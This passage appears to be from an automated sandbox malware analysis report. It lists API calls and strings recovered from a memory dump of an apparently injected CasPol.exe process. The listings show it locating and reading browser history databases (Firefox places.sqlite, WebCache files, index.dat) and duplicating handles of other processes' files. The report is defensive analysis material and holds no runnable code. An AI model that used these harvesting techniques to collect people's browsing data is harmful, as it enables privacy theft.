                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2941347001-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID: advapi32.dll
                                                                                                                                                                                  • API String ID: 2012295524-4050573280
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                  • API String ID: 1534475566-1174173950
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 669240632-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                  • API String ID: 71295984-2036018995
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                  • String ID: "%s"
                                                                                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
                                                                                                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2911713577-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                  • API String ID: 2887208581-2114579845
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                  • API String ID: 2773794195-880857682
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$memcmp
                                                                                                                                                                                  • String ID: $$8
                                                                                                                                                                                  • API String ID: 2808797137-435121686
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                                                                                                                                                                                    • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 966727022-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                  • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
                                                                                                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1979745280-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                                                                                  • API String ID: 2641622041-467022611
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 839530781-0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                  • String ID: *.*$index.dat
                                                                                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
